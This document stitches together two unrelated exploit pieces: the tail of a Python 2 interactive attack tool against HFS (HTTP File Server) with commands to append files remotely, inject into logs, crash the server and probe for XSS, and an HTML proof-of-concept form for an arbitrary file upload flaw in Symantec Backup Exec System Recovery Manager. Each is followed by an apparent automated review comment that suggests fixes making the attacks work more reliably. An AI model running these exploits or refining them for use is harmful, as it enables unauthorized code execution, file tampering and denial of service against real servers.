def showver():
cangetver = True
if banner != '':
server_name = banner.split()
print banner
if server_name[0] != 'HFS':
print 'Not running HFS!'
cangetver = False
else:
if isbanner(re_cangetver):
print 'Confirming version...'
else:
cangetver = False
else:
print 'No version information found.'
print 'The "Send HFS identifier" option is probably disabled.'
print 'Trying to force HFS to display its version...'
if cangetver == True:
idver = getservinfo('version','HFS version number')
idbuild = getservinfo('build','HFS build number')
globals()["banner"] = 'HFS '+idver+' '+idbuild
showacceptedcmds()
def result(s):
cmd = s.split()
if len(cmd) > 0:
curcmd = cmd[0]
result = 'Invalid command. Type "help" for list of commands.'
if curcmd == 'open':
procparams(cmd)
if ishostavailable():
showver()
result = 'Connected.\n'
else:
result = msg_fail
elif curcmd == 'symbols':
if ishostavailable():
showver()
print 'Forcing HFS to reveal more details...'
getallservinf()
result = msg_done
elif curcmd == 'ver':
if ishostavailable():
showver()
result = msg_done
elif curcmd == 'mkd':
if len(cmd) > 1:
if cmd[1] != []:
hfsmkdir(cmd[1])
result = msg_done
else:
result = msg_par_mis
elif curcmd == 'manipf':
if len(cmd) > 2:
try:
localfilecontent = readlocalfile(cmd[1])
except Exception, msg:
result = msg_acc_file,msg
else:
localfilecontent = localfilecontent.replace("\n","%0a")
hfsappendtofile(cmd[2],localfilecontent)
result = msg_done
else:
result = msg_par_mis
elif curcmd == 'maniplog':
if len(cmd) > 1:
try:
localfilecontent = readlocalfile(cmd[1])
except Exception, msg:
result = msg_acc_file,msg
else:
hfsinjecttolog(localfilecontent)
result = msg_done
else:
result = msg_par_mis
elif curcmd == 'checkdos':
shutdownhfs()
result = msg_done
elif curcmd == 'checkxss':
result = checkxss()
elif curcmd == 'help':
result = help
elif curcmd == 'readme':
result = readme
elif curcmd == 'quit':
result = 'Bye!'
return result
else:
return msg_help
print about
s = ""
while s != "quit":
try: s = raw_input(">")
except EOFError:
s = "quit"
print s
print result(s)
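Review bot: `dorequest` sends the same request up to three times — the `readlines()` call, the `'server' in opener.open(url).headers` test and the banner read each open a fresh connection — so a side-effecting command such as `shutdownhfs` or `hfsappendtofile` re-sends its payload, and once the DoS has actually landed the second open fails inside the `try` and the command is reported as failed rather than successful. Two smaller problems sit in the same block: `urllib2.build_opener(url)` passes the URL where handler instances are expected (on Python 2.4+ `add_handler` raises `TypeError` for a non-handler, which the broad `except Exception` would then print as a connection error — worth confirming against the interpreter the tool targets), and the `Authorization` line assigns a new `addheaders` list instead of appending, dropping the User-Agent set two lines earlier. Opening the URL once and reusing the response fixes all three while keeping the global `rcvd`/`banner` contract the rest of the script reads.
```python
def dorequest(hpath,auth_data,s_msg,f_msg):
    globals()["rcvd"] = ''
    globals()["banner"] = ''
    url = 'http://'+host+hpath
    try:
        opener = urllib2.build_opener()   # no handlers needed; the URL is not one
        opener.addheaders = [('User-agent', uagent)]
        if auth_data != '':
            # append so the User-Agent survives alongside the auth header
            opener.addheaders.append(('Authorization', 'Basic '+auth_data))
        # open exactly once: the payload carried in hpath/auth_data must not be re-sent
        resp = opener.open(url)
        globals()["rcvd"] = resp.readlines()
        if 'server' in resp.headers:
            globals()["banner"] = resp.headers['server']
    # … unchanged: except/else reporting via f_msg and s_msg …
```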


@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/27487/info
Symantec Backup Exec System Recovery Manager is prone to a vulnerability that allows arbitrary unauthorized files to be uploaded to any location on the affected server.
This issue resides in the Symantec LiveState Apache Tomcat server. Attackers can leverage it to execute arbitrary code with SYSTEM-level privileges and completely compromise affected computers.
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>File Upload POC</title></head>
<body>
<h2> Backup Exec System Recovery Manager 7.0<br>File Upload POC</h2>
<form action="https://www.example.com:8443/axis/FileUpload" method="post"
enctype="multipart/form-data">
Remote Path: <input name="path" size="100" type="text"
value="C:\Program Files\Symantec\Backup Exec System
Recovery\Manager\Services\tomcat\WebApps\axis"/><br/>
File to upload: <input name="log_file" type="file"/><br/>
<hr/>
<p><input type="submit"/><input type="reset"/></p>
</form>
(c)BastardLabs 2008.
</body>
</html>
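Review bot: The document declares itself XHTML (`<?xml version="1.0"?>` plus the `xmlns` on `<html>`), but the `<br>` inside the `<h2>` heading is not self-closed while the later `<br/>`, `<hr/>` and `<input …/>` elements are, so an XML-strict parser will reject the page before the form renders. Change it to `<br/>` for consistency with the rest of the markup. The form action is hard-wired to `https://www.example.com:8443/axis/FileUpload`, which readers must replace with the target host; a one-line HTML comment above the `<form>` saying so would save a wasted first attempt.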